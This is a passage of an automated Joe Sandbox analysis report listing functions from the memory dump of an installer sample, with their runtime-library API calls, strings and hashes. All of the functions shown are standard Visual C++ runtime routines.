API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 97ee94752312d832a7bbbd64144bcb5c1ea8ac06a34bd21beed010cbbde00d1c
Instruction ID: b76a4ec6cd75f7d1907dd196822de8286bc1ad6254e2d235877d0fef02844ce9
Opcode Fuzzy Hash: 97ee94752312d832a7bbbd64144bcb5c1ea8ac06a34bd21beed010cbbde00d1c
Instruction Fuzzy Hash: 1DF09E7760C23027D7303A2E6E85DEF7ABCCB44B24F146479FB59DB502E9219CC08295

Function 00A11A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A11A83
std::_Lockit::_Lockit.LIBCPMT ref: 00A11A95
std::exception::exception.LIBCMT ref: 00A11ACC

Part of subcall function 00A13C83: std::exception::_Copy_str.LIBCMT ref: 00A13C9E

__CxxThrowException@8.LIBCMT ref: 00A11AE1

Part of subcall function 00A1450C: RaiseException.KERNEL32(?,?,00A113AC,?,?,?,?,?,00A113AC,?,00A2CCE8,00000000), ref: 00A1454E

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A11AEA

Strings

bad locale name, xrefs: 00A11AC5

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: 5b6da25cc887e0fa0eaca23f428eca3424725662bf8de2b904e81835d219def9
Instruction ID: fe7363057479bef1740f996dc267aa83572f336b99a3c0656899c3325c860c14
Opcode Fuzzy Hash: 5b6da25cc887e0fa0eaca23f428eca3424725662bf8de2b904e81835d219def9
Instruction Fuzzy Hash: 040157B6801B54EECB21EFAED5804CEFFB4BB18700B40866FE55A93601C7749748CBA5

Function 00A1966F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00A2D638,00000008,00A19777,00000000,00000000,?,?,00A1A964,00A14478,?,?,00A13C78,?,?,00A1101C), ref: 00A19680
__lock.LIBCMT ref: 00A196B4

Part of subcall function 00A1B7B7: __mtinitlocknum.LIBCMT ref: 00A1B7CD
Part of subcall function 00A1B7B7: __amsg_exit.LIBCMT ref: 00A1B7D9
Part of subcall function 00A1B7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,00A196B9,0000000D), ref: 00A1B7E1

InterlockedIncrement.KERNEL32(?), ref: 00A196C1
__lock.LIBCMT ref: 00A196D5
___addlocaleref.LIBCMT ref: 00A196F3

Strings

KERNEL32.DLL, xrefs: 00A1967B

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: f938b68dbd9629610bbbeace89faef854440390113c616cb3eeb4e0634c3c529
Instruction ID: 2d5fa8745444043bf612c7399b1066d7e2c2e9265e43edd10599f9609fcbf292
Opcode Fuzzy Hash: f938b68dbd9629610bbbeace89faef854440390113c616cb3eeb4e0634c3c529
Instruction Fuzzy Hash: D1016171405B00DFD720DF79DA4578AFBF0AF50324F10891DE49A562E1CBB4A585CF15

Function 00A176D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A176F1

Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC

__getptd.LIBCMT ref: 00A17702
__getptd.LIBCMT ref: 00A17710

Strings

csm, xrefs: 00A176EA
RCC, xrefs: 00A176DC
MOC, xrefs: 00A176E3

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction ID: 44c92e3e976480047ac5731802fbe87f4ff5dcf2db303d13a6702fa3d1c71738
Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction Fuzzy Hash: 67E01A355181048FCF20AB68C14ABFD33A5EF48325F5E64A1E40DCB2A2D738E8D0CA82

Function 00A17993 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 00A179BB

Part of subcall function 00A14842: __getptd.LIBCMT ref: 00A14850
Part of subcall function 00A14842: __getptd.LIBCMT ref: 00A1485E

__getptd.LIBCMT ref: 00A179C5

Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC

__getptd.LIBCMT ref: 00A179D3
__getptd.LIBCMT ref: 00A179E1
__getptd.LIBCMT ref: 00A179EC
_CallCatchBlock2.LIBCMT ref: 00A17A12

Part of subcall function 00A148E7: __CallSettingFrame@12.LIBCMT ref: 00A14933

Part of subcall function 00A17AB9: __getptd.LIBCMT ref: 00A17AC8
Part of subcall function 00A17AB9: __getptd.LIBCMT ref: 00A17AD6

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 10d16ccdc4cff964419c923ae3608f8cb9d96c94bbfad410bfaee844ac034467
Instruction ID: 1ad538480fe432896ac967532fac897af0057f9731399065e2271c8d0210bb6e
Opcode Fuzzy Hash: 10d16ccdc4cff964419c923ae3608f8cb9d96c94bbfad410bfaee844ac034467
Instruction Fuzzy Hash: 371119B5C00209DFDF00EFA4C645AEE7BB1FF08320F148469F814A7292DB389A919F54

Function 00A1D224 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A1D230

Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC

__amsg_exit.LIBCMT ref: 00A1D250
__lock.LIBCMT ref: 00A1D260
InterlockedDecrement.KERNEL32(?), ref: 00A1D27D
_free.LIBCMT ref: 00A1D290
InterlockedIncrement.KERNEL32(01331670), ref: 00A1D2A8

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: fad2c5b1533f821b7ab997722a1139969a55bf11430495c28b67b210bb459c65
Instruction ID: 13465f600cbd098741a143afac1f38d7b7baa0792e91c3b5856a50a9f0fb9267
Opcode Fuzzy Hash: fad2c5b1533f821b7ab997722a1139969a55bf11430495c28b67b210bb459c65
Instruction Fuzzy Hash: 64018032D016219BCB31AFA89A05BED77B0BF44B61F094035E824A7691C77499C3CBD5

Function 00A11B03 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A11B08
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A11B1C

Part of subcall function 00A132F2: _setlocale.LIBCMT ref: 00A13304

_free.LIBCMT ref: 00A11B2A

Part of subcall function 00A14452: HeapFree.KERNEL32(00000000,00000000,?,00A13C78,?,?,00A1101C), ref: 00A14468
Part of subcall function 00A14452: GetLastError.KERNEL32(?,?,00A13C78,?,?,00A1101C), ref: 00A1447A

_free.LIBCMT ref: 00A11B3C
_free.LIBCMT ref: 00A11B4E
_free.LIBCMT ref: 00A11B60

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 770894815-0
Opcode ID: 80a26a8d2363093972cd04a0d9fb4034e4faa29df2879acc2354ed1bfd24c883
Instruction ID: 5c71f1f31ca3e80a9255f2b504c5fb3ac53a68bfb5e31006968c7e1c5b0ff749
Opcode Fuzzy Hash: 80a26a8d2363093972cd04a0d9fb4034e4faa29df2879acc2354ed1bfd24c883
Instruction Fuzzy Hash: 2D015A326147119BEB34AF68D606BDBB3E8BF04724F10851EF166DB580DB78E9848A64

Function 00A1153B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00A1155A
std::exception::exception.LIBCMT ref: 00A1157C

Strings

ios_base::eofbit set, xrefs: 00A11578, 00A115B4
ios_base::badbit set, xrefs: 00A1156E
ios_base::failbit set, xrefs: 00A115A4

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: cd2feca14d3cad1cfafe02fb5a5c652980e301da6fbc7e00445d5a360edfccd3
Instruction ID: 365ab887f634b22d4f2d06fa09ca05bb1be1634faea8555ebe233d2140bcb500
Opcode Fuzzy Hash: cd2feca14d3cad1cfafe02fb5a5c652980e301da6fbc7e00445d5a360edfccd3
Instruction Fuzzy Hash: 030175F2800218AFCB44EF6DC5066EE77F65B84724F548129EA169B101D674CB85CF51

Function 00A17D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00A17D53

Part of subcall function 00A17CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00A17CE4

_UnwindNestedFrames.LIBCMT ref: 00A17D6A
___FrameUnwindToState.LIBCMT ref: 00A17D78

Strings

csm, xrefs: 00A17D42
csm, xrefs: 00A17D4F, 00A17D64, 00A17D77, 00A17D95, 00A17DA5

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction ID: edcf5e8224193b4b5adbd642b72a9d22d9cdba7efafecfe48fafea5ba5d84296
Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction Fuzzy Hash: 5801EF31005109BBDF22AF51DD46EEE7F7AEF08360F145014BD1815162E7329AA1EFA1

Function 00A1DE68 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00A1DE76

Part of subcall function 00A1729E: __FF_MSGBANNER.LIBCMT ref: 00A172B7
Part of subcall function 00A1729E: __NMSG_WRITE.LIBCMT ref: 00A172BE
Part of subcall function 00A1729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00A163C9,00000000,00000001,00000000,?,00A1B742,00000018,00A2D728,0000000C,00A1B7D2), ref: 00A172E3

_free.LIBCMT ref: 00A1DE89

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 4c608b01514e0071d38e940802e2a564ddad9296ae4c6d7d36487b86e9448646
Instruction ID: e090880192b5dab0ce2c236b2ddebaba839e12470ba6a1ec75117f47057f2f80
Opcode Fuzzy Hash: 4c608b01514e0071d38e940802e2a564ddad9296ae4c6d7d36487b86e9448646
Instruction Fuzzy Hash: 9F113A32405615ABCF317FB4AD056DF37A6AF603B2F214026F85C8F190DF3088C18A90

Function 00A1D9A5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A1D9B1

Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC

__getptd.LIBCMT ref: 00A1D9C8
__amsg_exit.LIBCMT ref: 00A1D9D6
__lock.LIBCMT ref: 00A1D9E6
__updatetlocinfoEx_nolock.LIBCMT ref: 00A1D9FA

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: c31671d7b8ab5cf4b3ff32a218a25dd3a18e9849595e2f29be748a7d037efe45
Instruction ID: 245e1e8f67288ccf04f7965fab7d80e18103d4c32e4580adf62763c4fefe885c
Opcode Fuzzy Hash: c31671d7b8ab5cf4b3ff32a218a25dd3a18e9849595e2f29be748a7d037efe45
Instruction Fuzzy Hash: E6F0B432D417109FDB20BB789A07BDE77A0AF04734F15461AF414AB5D2CB7448C1CA56

Function 00A12628 Relevance: 6.2, APIs: 4, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa9e9f190880986999bb0c30447e4e8133f1d5f568fa7daba118a42f2ed1616
Instruction ID: a2ab8d05a0cb8214227cdb683b77eaf1a3f0fff95369cec6ac47cb43c89e3976
Opcode Fuzzy Hash: 3fa9e9f190880986999bb0c30447e4e8133f1d5f568fa7daba118a42f2ed1616
Instruction Fuzzy Hash: 4F516C75900609AFDF14DFA8C991AEEB7F9FF08314B20056EE152A7691E770EE94CB10

Function 00A15513 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A155AE
__flush.LIBCMT ref: 00A155CC
__write.LIBCMT ref: 00A155F3
__flsbuf.LIBCMT ref: 00A1561E

Part of subcall function 00A1A95F: __getptd_noexit.LIBCMT ref: 00A1A95F

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 0a320d7ba5da11b76fa0d1a75b86a0988114d44a0565f6f8a54b3bdf28141451
Instruction ID: 7121c388420f1bef635b6b0b25177e44b3cc6e913200f414ceb194355390ceff
Opcode Fuzzy Hash: 0a320d7ba5da11b76fa0d1a75b86a0988114d44a0565f6f8a54b3bdf28141451
Instruction Fuzzy Hash: 3D417131E00A04DBDB249F79C9856DEBBB7AFC03A0F288529E46597180E770DED58B90

Function 00A23BE5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A23C19
__isleadbyte_l.LIBCMT ref: 00A23C4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00A23C7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00A23CEB

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: b11f730f29b781adf6f24cc17525a74c2e212c4c001ce25a0552c48685e2afcb
Instruction ID: 7d3eaf61ad4244038cc54a9dad4fca1e0d8743ed1516d1bdbfb7717d2732a603
Opcode Fuzzy Hash: b11f730f29b781adf6f24cc17525a74c2e212c4c001ce25a0552c48685e2afcb
Instruction Fuzzy Hash: 1331E532A042A5EFCF20DF6CD884ABA7BB1BF02310F1585B9E461AB191D734DE84DB50

Function 00A1913A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A19160

Part of subcall function 00A18F8C: __fltout2.LIBCMT ref: 00A18FB7

__cftog_l.LIBCMT ref: 00A19186
__cftoe_l.LIBCMT ref: 00A191B8

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: a27f378ce91effd01da9952fa7d1104d1885bd21952d34444bb8f4f706539e76
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 4511667600018ABBCF625F84CC15CEE3F36BB58390B588515FA1859020C736C9F2EB82

Function 00A1168B Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 00A1169D
_wprintf.LIBCMT ref: 00A116B5
_wprintf.LIBCMT ref: 00A116CA
_wprintf.LIBCMT ref: 00A116E2

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: _wprintf
String ID:
API String ID: 2738768116-0
Opcode ID: 740d22d58360f5726250e2c61c22d0522de7f4333f7273cb60cf7ebc13d2395a
Instruction ID: 7a871eaaf53c6c64e6fee7ca601a7f41d53d4870c6d60f3762544866e466888b
Opcode Fuzzy Hash: 740d22d58360f5726250e2c61c22d0522de7f4333f7273cb60cf7ebc13d2395a
Instruction Fuzzy Hash: 5BF0371394913139952C31AA354E9C7AF44FA16FF5F25142AF9ECE50D1594644C281D5

Function 00A135C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00A135E2

Part of subcall function 00A138C4: std::exception::exception.LIBCMT ref: 00A138D9
Part of subcall function 00A138C4: __CxxThrowException@8.LIBCMT ref: 00A138EE

Part of subcall function 00A12276: std::_Xinvalid_argument.LIBCPMT ref: 00A12287

_memmove.LIBCMT ref: 00A1363D

Strings

invalid string position, xrefs: 00A135DD

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position
API String ID: 1253240057-1799206989
Opcode ID: 8d4ce161d46f96b603c51748e84a1240a8225dcc136a7a49ac94e95d464ebe07
Instruction ID: 87e450e3c7e2965ac1eaa4c886fcd70abe29278c427e0075fa7bd8f3ceea2fee
Opcode Fuzzy Hash: 8d4ce161d46f96b603c51748e84a1240a8225dcc136a7a49ac94e95d464ebe07
Instruction Fuzzy Hash: 9211C433304250BBCF249F0D9881AEBB7A9EB91760F10052EF9668B381CB71DAC18795

Function 00A12158 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00A1216E

Part of subcall function 00A138C4: std::exception::exception.LIBCMT ref: 00A138D9
Part of subcall function 00A138C4: __CxxThrowException@8.LIBCMT ref: 00A138EE

_memmove.LIBCMT ref: 00A121A7

Strings

invalid string position, xrefs: 00A12169

Memory Dump Source

Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: ec8e38cc0de280e16c37f3b88ee8e6ef127f2552cc377a6e1a3593562aa6f3ff
Instruction ID: 78dfc69b9a585c15ff55933adcadc9e9dd51701efad4c239aecb33678d843ec8
